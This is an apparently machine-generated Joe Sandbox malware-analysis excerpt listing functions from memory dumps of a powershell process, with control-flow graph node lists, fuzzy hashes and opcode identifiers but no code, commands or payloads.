            control_flow_graph 694 7ff9c550efa9-7ff9c550efad 695 7ff9c550efaf 694->695 696 7ff9c550efb5 694->696 695->696 697 7ff9c550efb7 696->697 698 7ff9c550efb8-7ff9c550efc9 696->698 697->698 699 7ff9c550efcb 698->699 700 7ff9c550efcc-7ff9c550f046 698->700 699->700 704 7ff9c550f058 700->704 705 7ff9c550f048-7ff9c550f056 700->705 706 7ff9c550f05d-7ff9c550f05f 704->706 705->706 707 7ff9c550f071-7ff9c550f08f 706->707 708 7ff9c550f061-7ff9c550f06f 706->708 712 7ff9c550f094-7ff9c550f0f4 707->712 708->707 718 7ff9c550f16b-7ff9c550f19c 712->718 719 7ff9c550f0f6-7ff9c550f130 712->719 723 7ff9c550f1a2-7ff9c550f1f6 718->723 724 7ff9c550f315-7ff9c550f32b call 7ff9c550f50f 718->724 728 7ff9c550f13c-7ff9c550f169 719->728 729 7ff9c550f132 719->729 742 7ff9c550f1fc-7ff9c550f21b 723->742 743 7ff9c550f2dd-7ff9c550f2eb call 7ff9c550f4c8 723->743 733 7ff9c550f32d-7ff9c550f338 724->733 734 7ff9c550f398-7ff9c550f3ec 724->734 728->718 728->719 729->728 737 7ff9c550f33a-7ff9c550f35b 733->737 738 7ff9c550f391-7ff9c550f396 733->738 765 7ff9c550f41d-7ff9c550f454 734->765 766 7ff9c550f3ee-7ff9c550f416 734->766 737->738 756 7ff9c550f35d-7ff9c550f372 737->756 738->733 738->734 749 7ff9c550f21d-7ff9c550f222 742->749 750 7ff9c550f224 742->750 752 7ff9c550f2ed-7ff9c550f2f5 743->752 753 7ff9c550f2f7-7ff9c550f30f 743->753 754 7ff9c550f226-7ff9c550f228 749->754 750->754 752->724 752->753 753->723 753->724 758 7ff9c550f22e-7ff9c550f238 754->758 759 7ff9c550f2bf-7ff9c550f2d7 754->759 767 7ff9c550f37b 756->767 768 7ff9c550f374-7ff9c550f379 756->768 761 7ff9c550f24a-7ff9c550f25a 758->761 762 7ff9c550f23a-7ff9c550f248 758->762 759->742 759->743 774 7ff9c550f25d-7ff9c550f265 761->774 762->761 762->774 776 7ff9c550f456-7ff9c550f472 765->776 777 7ff9c550f4b8-7ff9c550f4c6 765->777 766->765 771 7ff9c550f37d-7ff9c550f37f 767->771 768->771 771->738 775 7ff9c550f381-7ff9c550f38a 771->775 779 7ff9c550f296-7ff9c550f299 774->779 780 7ff9c550f267-7ff9c550f287 774->780 775->738 784 7ff9c550f47e-7ff9c550f4b6 776->784 785 7ff9c550f474 776->785 779->759 783 7ff9c550f29b-7ff9c550f2aa 779->783 780->779 786 7ff9c550f289-7ff9c550f28e 780->786 783->759 789 7ff9c550f2ac-7ff9c550f2b8 783->789 784->776 784->777 785->784 786->779 789->759
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c175f51522e5f052bced9b96ec7aa3c4d3d628f7f1e035db3594dd2e0bed7bc5
            • Instruction ID: cd40127ba8f27bfbc7f9a44ba9f3933b0037ca9953cfed7627c2b4feab57320f
            • Opcode Fuzzy Hash: c175f51522e5f052bced9b96ec7aa3c4d3d628f7f1e035db3594dd2e0bed7bc5
            • Instruction Fuzzy Hash: 8B02E435A0CA8B4FEB94DF1898657B977E1EF9A704F5400B9D44ED32C6CE66B842CB40
            Function 00007FF9C58B271A Relevance: 3.0, Strings: 2, Instructions: 461COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 119 7ff9c58b271a-7ff9c58b272e 121 7ff9c58b2754-7ff9c58b275e 119->121 122 7ff9c58b2730-7ff9c58b2743 119->122 123 7ff9c58b2764-7ff9c58b2785 121->123 124 7ff9c58b28ab-7ff9c58b28d3 121->124 128 7ff9c58b2d3c-7ff9c58b2d7b 122->128 129 7ff9c58b2749-7ff9c58b274e 122->129 136 7ff9c58b2787-7ff9c58b27d2 123->136 137 7ff9c58b27d5-7ff9c58b27d8 123->137 130 7ff9c58b28d5-7ff9c58b2913 124->130 131 7ff9c58b291e-7ff9c58b2921 124->131 182 7ff9c58b2ddb 128->182 183 7ff9c58b2d7d-7ff9c58b2dd5 call 7ff9c58b1920 128->183 129->121 139 7ff9c58b291a-7ff9c58b291b 130->139 134 7ff9c58b2927-7ff9c58b2941 131->134 135 7ff9c58b288a-7ff9c58b288d 131->135 134->135 141 7ff9c58b2947-7ff9c58b2996 134->141 142 7ff9c58b2893-7ff9c58b2897 135->142 143 7ff9c58b29ee-7ff9c58b29f2 135->143 136->137 137->135 138 7ff9c58b27de-7ff9c58b27e2 137->138 138->135 146 7ff9c58b27e8-7ff9c58b2833 138->146 139->131 141->135 184 7ff9c58b299c-7ff9c58b29e9 141->184 142->143 147 7ff9c58b289d-7ff9c58b28a6 142->147 144 7ff9c58b29f8-7ff9c58b29fb 143->144 145 7ff9c58b2b80-7ff9c58b2b8c 143->145 144->145 151 7ff9c58b2a01-7ff9c58b2a05 144->151 149 7ff9c58b2bf7-7ff9c58b2bfa 145->149 150 7ff9c58b2b8e-7ff9c58b2b8f 145->150 146->135 197 7ff9c58b2835-7ff9c58b2887 146->197 154 7ff9c58b3012-7ff9c58b3032 call 7ff9c58b307a 147->154 158 7ff9c58b3007-7ff9c58b300c 149->158 159 7ff9c58b2c00-7ff9c58b2c06 149->159 155 7ff9c58b2b93 150->155 151->145 156 7ff9c58b2a0b-7ff9c58b2a28 151->156 155->149 161 7ff9c58b2b95-7ff9c58b2bae 155->161 156->145 180 7ff9c58b2a2e-7ff9c58b2a33 156->180 158->154 162 7ff9c58b2c77-7ff9c58b2c7b 159->162 163 7ff9c58b2c08-7ff9c58b2c0a 159->163 161->149 169 7ff9c58b2bb0-7ff9c58b2bf1 161->169 167 7ff9c58b2f54-7ff9c58b2f5c 162->167 168 7ff9c58b2c81-7ff9c58b2c82 162->168 172 7ff9c58b2c86 163->172 173 7ff9c58b2c0c 163->173 167->158 178 7ff9c58b2f62-7ff9c58b2fc8 167->178 168->172 169->149 179 7ff9c58b2e18-7ff9c58b2e42 169->179 176 7ff9c58b2c11-7ff9c58b2c2c 172->176 177 7ff9c58b2c88-7ff9c58b2c8c 172->177 173->155 181 7ff9c58b2c0e 173->181 189 7ff9c58b2c32-7ff9c58b2c39 176->189 190 7ff9c58b2ee0-7ff9c58b2eea 176->190 177->167 185 7ff9c58b2c8e-7ff9c58b2ca2 177->185 196 7ff9c58b2fd2-7ff9c58b2fe4 178->196 227 7ff9c58b2e48-7ff9c58b2e5b 179->227 186 7ff9c58b2b39-7ff9c58b2b49 180->186 187 7ff9c58b2a39-7ff9c58b2a5d 180->187 181->176 191 7ff9c58b2def-7ff9c58b2dff 182->191 192 7ff9c58b2ddd-7ff9c58b2ded 182->192 183->182 184->135 185->167 214 7ff9c58b2ca8-7ff9c58b2cc4 185->214 215 7ff9c58b2b4b-7ff9c58b2b7e 186->215 236 7ff9c58b2ad2-7ff9c58b2b37 187->236 237 7ff9c58b2a5f-7ff9c58b2ad0 187->237 189->158 198 7ff9c58b2c3f-7ff9c58b2c46 189->198 199 7ff9c58b2e01-7ff9c58b2e11 191->199 200 7ff9c58b2e5f-7ff9c58b2ec7 191->200 192->191 196->158 204 7ff9c58b2fe6-7ff9c58b2fff 196->204 197->135 208 7ff9c58b2c4c-7ff9c58b2c53 198->208 209 7ff9c58b2eef-7ff9c58b2ef6 198->209 199->179 239 7ff9c58b2f27-7ff9c58b2f51 200->239 252 7ff9c58b2ec9-7ff9c58b2ed9 200->252 204->158 208->158 212 7ff9c58b2c59-7ff9c58b2c5e 208->212 231 7ff9c58b2efe-7ff9c58b2f10 209->231 212->158 222 7ff9c58b2c64-7ff9c58b2c71 212->222 228 7ff9c58b2d03-7ff9c58b2d37 214->228 229 7ff9c58b2cc6-7ff9c58b2cf8 214->229 215->145 222->162 222->167 240 7ff9c58b2e5d-7ff9c58b2e5e 227->240 228->231 229->228 231->239 236->215 237->215 239->167 240->200 252->190
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"$6"
            • API String ID: 0-2003467497
            • Opcode ID: 9d3dee340de1f582b56186826366184a33dc6450671b502eb8ebe3ba751516f8
            • Instruction ID: 8d0736832b4da11ee01afd914e5a7be34d1386ba1e0b0dbc61f28669d9567fa5
            • Opcode Fuzzy Hash: 9d3dee340de1f582b56186826366184a33dc6450671b502eb8ebe3ba751516f8
            • Instruction Fuzzy Hash: BCE17770A18A5A8FDB98EF18C8457B977E1FF59700F00457AE44ED3296DE74B8818F81
            Function 00007FF9C5147DD1 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 419 7ff9c5147dd1-7ff9c5147ddd 420 7ff9c5147ddf 419->420 421 7ff9c5147de1-7ff9c5147e1a 419->421 420->421 422 7ff9c5147e21-7ff9c5147e48 420->422 421->422 425 7ff9c5147e4a-7ff9c5147e4f 422->425 426 7ff9c5147e52-7ff9c5147e84 GetFileAttributesW 422->426 425->426 427 7ff9c5147e8c-7ff9c5147eb1 426->427 428 7ff9c5147e86 426->428 428->427
            APIs
            Memory Dump Source
            • Source File: 00000022.00000002.2029430950.00007FF9C5140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5140000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5140000_powershell.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: 2769d6a9e0f4cbf6acb781f63eec51483dfd5b80e19eea193c929d06ebdda97f
            • Instruction ID: 1032035e5cf767cf5962e062deb7b9c94f05ccd8c902a7b47369817893809477
            • Opcode Fuzzy Hash: 2769d6a9e0f4cbf6acb781f63eec51483dfd5b80e19eea193c929d06ebdda97f
            • Instruction Fuzzy Hash: F531A03190CA4D8FDB69DF6888496E9BBF1EF56711F04826FD049D3252DB70A806CB91
            Function 00007FF9C544042A Relevance: 1.5, Strings: 1, Instructions: 251COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 482 7ff9c544042a-7ff9c54404b4 486 7ff9c54404ba-7ff9c54404c4 482->486 487 7ff9c54405bd-7ff9c5440639 482->487 488 7ff9c54404e0-7ff9c54404ed 486->488 489 7ff9c54404c6-7ff9c54404de 486->489 496 7ff9c54404ef-7ff9c54404f2 488->496 497 7ff9c5440561-7ff9c544056b 488->497 489->488 496->497 499 7ff9c54404f4-7ff9c54404fc 496->499 500 7ff9c544057a-7ff9c54405ba 497->500 501 7ff9c544056d-7ff9c5440579 497->501 499->487 503 7ff9c5440502-7ff9c544050c 499->503 500->487 506 7ff9c544050e-7ff9c5440523 503->506 507 7ff9c5440525-7ff9c5440529 503->507 506->507 507->497 510 7ff9c544052b 507->510 514 7ff9c5440531-7ff9c544053a 510->514 515 7ff9c544053c-7ff9c5440549 514->515 516 7ff9c5440553-7ff9c5440560 514->516 515->516 518 7ff9c544054b-7ff9c5440551 515->518 518->516
            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2040592094.00007FF9C5440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5440000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5440000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 0U #
            • API String ID: 0-2365300278
            • Opcode ID: f3208b5203e5498400fd5a50225544426a1cb38ee23cefbcc03fc01957ccfda1
            • Instruction ID: fb798e04e2de47903f31780bb574f3513cb869abaf67d338827e6b79f25183e8
            • Opcode Fuzzy Hash: f3208b5203e5498400fd5a50225544426a1cb38ee23cefbcc03fc01957ccfda1
            • Instruction Fuzzy Hash: 40616632A0DA8A8FEB91DB2C58547B57BE1EF99711F1800FBC04DCB193DE68AC168750
            Function 00007FF9C5B832D3 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
            Download Yara Rule

            Control-flow Graph

            Strings
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: 6"
            • API String ID: 0-4197299889
            • Opcode ID: 736ff34f08e3028e8d76e89dabeefd69abdd97a14f44e98413be7672cd6ac5d1
            • Instruction ID: 2fc4712a316219faee125720d683b8a35f04328351a09d10b80fafab7bf7ddce
            • Opcode Fuzzy Hash: 736ff34f08e3028e8d76e89dabeefd69abdd97a14f44e98413be7672cd6ac5d1
            • Instruction Fuzzy Hash: 56418F71B18A4A4FEB54EF689C563B9BAD1FF4A710F4441BAE40DE3393DE6578018780
            Function 00007FF9C5B71DFD Relevance: .4, Instructions: 436COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 792 7ff9c5b71dfd-7ff9c5b71e09 793 7ff9c5b71e0b 792->793 794 7ff9c5b71e0c-7ff9c5b71e1d 792->794 793->794 795 7ff9c5b71e1f 794->795 796 7ff9c5b71e20-7ff9c5b71e31 794->796 795->796 797 7ff9c5b71e33 796->797 798 7ff9c5b71e34-7ff9c5b71e45 796->798 797->798 799 7ff9c5b71e47 798->799 800 7ff9c5b71e48-7ff9c5b71eca 798->800 799->800 803 7ff9c5b71ecc-7ff9c5b71ed6 800->803 804 7ff9c5b71ed8 800->804 805 7ff9c5b71edd-7ff9c5b71edf 803->805 804->805 806 7ff9c5b72188-7ff9c5b721a5 805->806 807 7ff9c5b71ee5-7ff9c5b71eee 805->807 814 7ff9c5b721ac-7ff9c5b721af 806->814 809 7ff9c5b71ef4-7ff9c5b71f16 807->809 810 7ff9c5b71fa1-7ff9c5b71fea 807->810 820 7ff9c5b7204b-7ff9c5b7204e 809->820 821 7ff9c5b71f1c-7ff9c5b71f4c 809->821 817 7ff9c5b71ff0-7ff9c5b72001 810->817 818 7ff9c5b71fec-7ff9c5b71fed 810->818 819 7ff9c5b721b2-7ff9c5b721cb call 7ff9c5b72213 814->819 831 7ff9c5b72007-7ff9c5b72012 817->831 832 7ff9c5b72003-7ff9c5b72004 817->832 818->817 823 7ff9c5b72050-7ff9c5b72056 820->823 824 7ff9c5b7205b-7ff9c5b72093 820->824 828 7ff9c5b71f4e-7ff9c5b71f4f 821->828 829 7ff9c5b71f52-7ff9c5b71f63 821->829 823->819 840 7ff9c5b72099-7ff9c5b720af 824->840 841 7ff9c5b72174-7ff9c5b7217c call 7ff9c5b721cc 824->841 828->829 836 7ff9c5b71f69-7ff9c5b71f74 829->836 837 7ff9c5b71f65-7ff9c5b71f66 829->837 831->820 839 7ff9c5b72014-7ff9c5b72046 831->839 832->831 836->820 849 7ff9c5b71f7a-7ff9c5b71f9c 836->849 837->836 839->819 843 7ff9c5b720c3-7ff9c5b720d9 840->843 844 7ff9c5b720b1-7ff9c5b720c2 840->844 841->814 853 7ff9c5b720db-7ff9c5b720ee 843->853 854 7ff9c5b720f5-7ff9c5b72102 843->854 844->843 849->819 853->854 856 7ff9c5b72106-7ff9c5b7210c 854->856 857 7ff9c5b7212e-7ff9c5b72132 856->857 858 7ff9c5b7210e-7ff9c5b72126 856->858 860 7ff9c5b72158-7ff9c5b7215c 857->860 861 7ff9c5b72134-7ff9c5b7214a 857->861 858->840 862 7ff9c5b7212c 858->862 863 7ff9c5b7216e-7ff9c5b72186 call 7ff9c5b721cc 860->863 864 7ff9c5b7215e-7ff9c5b72168 860->864 868 7ff9c5b72150-7ff9c5b72156 861->868 869 7ff9c5b7214c-7ff9c5b7214d 861->869 862->841 863->819 864->863 868->860 869->868
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d3d6919392236fe2fc3b45f150d23ce2892d546a7aad15000da87236f7a8fbd0
            • Instruction ID: 256393223fd8c3a3c4599aadc4e1116796d2af4dd26d41e039a5992a211fc239
            • Opcode Fuzzy Hash: d3d6919392236fe2fc3b45f150d23ce2892d546a7aad15000da87236f7a8fbd0
            • Instruction Fuzzy Hash: AFD19330A1CE4A8FDB95EF28C464BA9BBE1FF59740F1400B9D44ED72A6CE65B841CB50
            Function 00007FF9C5B75730 Relevance: .3, Instructions: 335COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dfe647db97e5c934a927e4351ac3deb9eb4e2f90307c70d064f4649ce2ba0bc0
            • Instruction ID: 1f5751f8351428fdf9ecc8a5327f5d0255d9b10d98efa58943b204c665df9444
            • Opcode Fuzzy Hash: dfe647db97e5c934a927e4351ac3deb9eb4e2f90307c70d064f4649ce2ba0bc0
            • Instruction Fuzzy Hash: C1B1E132E0C61B8BE764EF2898453FA7BD0EF15714F14417AD84DD7293EF68B8418A85
            Function 00007FF9C5B7CF1C Relevance: .3, Instructions: 252COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cc7e384a982ed7ac277e721bcce124b62b4b18c80d246dfc4a30031c72565e0
            • Instruction ID: a5974f76ab390038f9a0f52d58cd1cde99567f555b6cf9357bfc2037f98b2927
            • Opcode Fuzzy Hash: 4cc7e384a982ed7ac277e721bcce124b62b4b18c80d246dfc4a30031c72565e0
            • Instruction Fuzzy Hash: ED712731E0CA4A4FEB58DF5888657B97FE1FF58790F44017ED40DD72A2CEA4A8028780
            Function 00007FF9C5B77400 Relevance: .2, Instructions: 248COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2d5e2a5d35d085c7c3e8e9975b072370119075aa8399b49cbcc8e520db4df83
            • Instruction ID: edec347b635945f2d7a441cfc3ca9464171fcf1212d4d78cb649e51f5e310503
            • Opcode Fuzzy Hash: b2d5e2a5d35d085c7c3e8e9975b072370119075aa8399b49cbcc8e520db4df83
            • Instruction Fuzzy Hash: 5761D531E0CA0E4FEB58DE5898657B97BE1FB98790F54013ED40DD7292DEA5B8028B90
            Function 00007FF9C58B4C4B Relevance: .2, Instructions: 243COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4b526dd0fc4f981776b86ef8d1aba2d9e1372570d10609d907e07c495431fedc
            • Instruction ID: c683fcf63ff13d91d3cb6fb6b7361dfe375cc1f14556be5c6dc322625a1e2836
            • Opcode Fuzzy Hash: 4b526dd0fc4f981776b86ef8d1aba2d9e1372570d10609d907e07c495431fedc
            • Instruction Fuzzy Hash: 38814D30A18A4A8FEB58EF18C855BA977E2FF99700F544179E40DD7296CE74B842CB81
            Function 00007FF9C550F892 Relevance: .2, Instructions: 200COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2043566819.00007FF9C54F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C54F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c54f0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 326b45ac08b699a53262d6a9a0c9fcb31798f14863e233bac4c320ace9f76583
            • Instruction ID: 30cbbbd141ae4490200897f6ff9a417e58c9e89f82eca13cd697341a39a3dd99
            • Opcode Fuzzy Hash: 326b45ac08b699a53262d6a9a0c9fcb31798f14863e233bac4c320ace9f76583
            • Instruction Fuzzy Hash: F2510335A08A4E5FEB50EB29D8846F637E2FFC6311F14057BD40DC7182EA6AE842CB40
            Function 00007FF9C5B77C93 Relevance: .2, Instructions: 181COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fd1e08c0cb4feb63955da2045b51f82f28792ba680bb79220363e45d0edb29d3
            • Instruction ID: ad2bf5f46fc30e8e880d5fe1033404247cf5f16d90b1db7ae16259653e90cce2
            • Opcode Fuzzy Hash: fd1e08c0cb4feb63955da2045b51f82f28792ba680bb79220363e45d0edb29d3
            • Instruction Fuzzy Hash: AD519F3190CB498FDB58DF1CD8457B9BBE0EB99711F00822EE44EC3295DBB4E5158B86
            Function 00007FF9C5B7D240 Relevance: .2, Instructions: 179COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 771b15c6d22ac916967d4544be0004c022b58bec0f9db98aa4c4585855854195
            • Instruction ID: ed16bb6668ed35b5ae8ac05ceeedca72c625721b245b9c2f246b1779af7b04f0
            • Opcode Fuzzy Hash: 771b15c6d22ac916967d4544be0004c022b58bec0f9db98aa4c4585855854195
            • Instruction Fuzzy Hash: 1E51E930A1CB494FDB58DB1CD856BA97BE0FB99310F04426FE44DD3292DB64B856CB82
            Function 00007FF9C5B77CD3 Relevance: .2, Instructions: 160COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b18e4f24619a6a4e9856e216b8b0b93709a48c4f1c508b1972d997c913b0ebe5
            • Instruction ID: 5b92a43613a6a645ce8a55a4d4bb4bda139b36f1ffc3bd693ad73ec7f8cc893a
            • Opcode Fuzzy Hash: b18e4f24619a6a4e9856e216b8b0b93709a48c4f1c508b1972d997c913b0ebe5
            • Instruction Fuzzy Hash: 4C41D13090DF4A4BDB5CEB2C98467B9BBE0FB95715F00823ED04AC3251DBB4B5168B85
            Function 00007FF9C5B7B920 Relevance: .2, Instructions: 156COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 15798df58f79709aca7616d7b42686263b6abd2306f59702927b5be98c0a5d39
            • Instruction ID: 697ff4780ae80a9551feaad4adf4c4deb0cbab30e1929f686af8b815002a4640
            • Opcode Fuzzy Hash: 15798df58f79709aca7616d7b42686263b6abd2306f59702927b5be98c0a5d39
            • Instruction Fuzzy Hash: BC41F731A0CE4D4FDB99EB6C98557F97BE1FF9A320F04426BD00DD3192DE6468068B81
            Function 00007FF9C5B7B771 Relevance: .1, Instructions: 144COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8d4eddef95e090dc5b8a076252ea4751c39a66bebe6bd067a819cdf68fbc4a7b
            • Instruction ID: 203c3fd0ca4fa599c40299155c0941529f30aed04e5091c6b7b451c972cd1ec1
            • Opcode Fuzzy Hash: 8d4eddef95e090dc5b8a076252ea4751c39a66bebe6bd067a819cdf68fbc4a7b
            • Instruction Fuzzy Hash: 26418631A1990B4FEB54EF7898556FE7BE1FF58351F00017AE40DD72D2DE68A8428B90
            Function 00007FF9C58B2F13 Relevance: .1, Instructions: 123COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2060860178.00007FF9C58B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C58B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c58b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e14b037004ea87605f3bddd2b448833ac99e9c5bd83f961298cae6ec2000986c
            • Instruction ID: 051c3c41016c25298bd4637a419ca33b6f056708079a2b68ff4ce1fd122f5a36
            • Opcode Fuzzy Hash: e14b037004ea87605f3bddd2b448833ac99e9c5bd83f961298cae6ec2000986c
            • Instruction Fuzzy Hash: A541507091C75A8FDB58DF08D8527A9BBE0FF59B00F10056EE58AD3291CB75B8428F82
            Function 00007FF9C53B0BCB Relevance: .1, Instructions: 105COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2038623000.00007FF9C53B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C53B0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c53b0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47c0fe0d2456dc8ce0fef8ae77d26986337a48e721d450d0537b22a5b7210b85
            • Instruction ID: 8ef6ba8726067f65c7f65a6ab873a3ae9f2c828850a05100dfb444ad78b43225
            • Opcode Fuzzy Hash: 47c0fe0d2456dc8ce0fef8ae77d26986337a48e721d450d0537b22a5b7210b85
            • Instruction Fuzzy Hash: BE31E357E1CAC74EE352EB3868952A5ABD0EF4B61870800FBD88DDA1D3EC4868464652
            Function 00007FF9C575ECE1 Relevance: .1, Instructions: 101COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2055262538.00007FF9C5750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5750000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5750000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2fafff50ee4e5ca913d998a3c94ec1e74fce7eaf3ba2bd5fcb22d91e6ca1207c
            • Instruction ID: b939e290bc58f8d38ff4252351eca759f09439343e865f1e282d37bca1fa6aab
            • Opcode Fuzzy Hash: 2fafff50ee4e5ca913d998a3c94ec1e74fce7eaf3ba2bd5fcb22d91e6ca1207c
            • Instruction Fuzzy Hash: 9F219B71E1C5174AF678D90DA4413792285EB89F10FA442BAD88EC23D5CDAD7CC74A85
            Function 00007FF9C5B7DC88 Relevance: .1, Instructions: 80COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d9237e09e660eb5919031816ddc7dbd5b27d8cce764e14951ad01fa172c425e
            • Instruction ID: 7b0b03f8046db08e1dfd27f51229e9a2d365c1d3818521b30175852276e456df
            • Opcode Fuzzy Hash: 4d9237e09e660eb5919031816ddc7dbd5b27d8cce764e14951ad01fa172c425e
            • Instruction Fuzzy Hash: CC212D30A14A4E4FDB84EF18C8A57FA7BE1FF58740F104579E40DD7296CA75A841CB80
            Function 00007FF9C5B7916C Relevance: .1, Instructions: 78COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000022.00000002.2069164296.00007FF9C5B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9C5B70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_34_2_7ff9c5b70000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
